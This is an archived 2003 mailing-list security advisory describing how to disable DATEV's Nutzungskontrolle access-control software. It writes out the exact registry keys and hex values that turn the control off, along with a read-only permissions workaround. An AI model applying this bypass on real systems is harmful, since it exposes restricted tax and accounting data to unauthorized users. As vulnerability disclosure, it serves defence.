lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200311011329.hA1DTqYI084845@mailserver3.hushmail.com>
From: t4rku5 at hushmail.com (t4rku5@...hmail.com)
Subject: DATEV Nutzungskontrolle Bypassing (REG)

Topic: DATEV Nutzungskontrolle Bypassing

Release Date: 2003-10-30


Affected system:
================

- Nutzungskontrolle V.2.2
- Nutzungskontrolle V.2.1


Unaffected system:
==================

- none known


Summary:
========

DATEV eG is a German Company, which makes Software for tax advisors and

lawyers. The Nutzungskontrolle (NUKO) is a Software to restrict the access
for the users. For example, a normal user is not allowed to see the internal
reward accounting data. These data are restrictet by the NUKO by, for

example, blocking the "advisor number", which is used for all data in
the
internal reward accounting.


Issue:
======

It is possible to deactivate the NUKO with just importing 2 registry
keys:


[HKEY_LOCAL_MACHINE\SOFTWARE\DATEV]
"NukoInfo"=hex:00,00,00,00,00,00,00,00,e4,6c,d9,ce,f1,69,97,e7,61,eb,

08,48,e7,\
71,65,9b

[HKEY_LOCAL_MACHINE\SOFTWARE\DATEVeG\Components\B0000046\Versions\1.0\NukoInfos]
"NukoInfo"=hex:00,00,00,00,00,00,00,00,e4,6c,d9,ce,f1,69,97,e7,61,eb,

08,48,e7,\
71,65,9b


If these 2 keys are importet, the NUKO is deactivated for the complete
machine. So it is possible to see all data which are normaly restricted
by the
NUKO.

The first 8 hex positions are freely choosable and dont have to be the
same as
in the second key. The next 16 positons have to be exactly as in the
example.

To activate the NUKO just import the following keys:


[HKEY_LOCAL_MACHINE\SOFTWARE\DATEV]
"NukoInfo"=hex:00,00,00,00,00,00,00,00,ee,37,8f,26,b2,e2,e6,ed,b7,ee,

c0,1d,f4,\
84,62,c4

[HKEY_LOCAL_MACHINE\SOFTWARE\DATEVeG\Components\B0000046\Versions\1.0\NukoInfos]
"NukoInfo"=hex:00,00,00,00,00,00,00,00,ee,37,8f,26,b2,e2,e6,ed,b7,ee,

c0,1d,f4,\
84,62,c4



Workaround:
===========

Give normal users "read only" access to this Registry keys.


Credits:
========

Discovered by t4rku5 



Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
https://www.hushmail.com/services.php?subloc=messenger&l=434

Promote security and make money with the Hushmail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ